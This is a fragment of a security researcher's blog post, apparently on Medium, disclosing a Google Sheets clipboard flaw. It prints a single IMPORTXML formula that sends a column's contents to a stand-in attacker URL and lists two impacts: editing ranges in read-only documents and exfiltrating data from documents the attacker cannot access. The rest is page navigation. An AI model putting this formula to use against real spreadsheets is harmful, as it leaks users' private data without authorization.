Clipboard hazard with Google Sheets

=IMPORTXML(CONCAT("https://attacker.controller.path/";CONCATENATE($C:$C)); "/root")
  • #1: modify range(s) of a document where he/she has only read-only access. Full control over the content.
  • #2: exfiltrate data from a document that the attacker has no access to (but knows the ID of the document).

--

--

--

Software developer daytime, security researcher in freetime

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Man In The Middle Attack (MITM) Part 2 — Packet Sniffer

Threats and vulnerabilities landscape focused on CyberSecurity approach.

{UPDATE} My City - Entertainment Tycoon Hack Free Resources Generator

Tixl Token Distribution Dates

Crucial Considerations for Developing a Cryptocurrency Wallet Application

What Are The Impacts Of Data Quality, Safety, And Encryption?

InsureDAO

Women in Tech: Archana Ramamoorthy

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Imre Rad

Imre Rad

Software developer daytime, security researcher in freetime

More from Medium

How we Setup Google Search Console API data in GSheet

Google sheets formula on Zapier using fuzzy lookup for sheets

AI Tools For LinkedIn Email Finder

Open the respective Knowledge Base search result using the openSearchResult API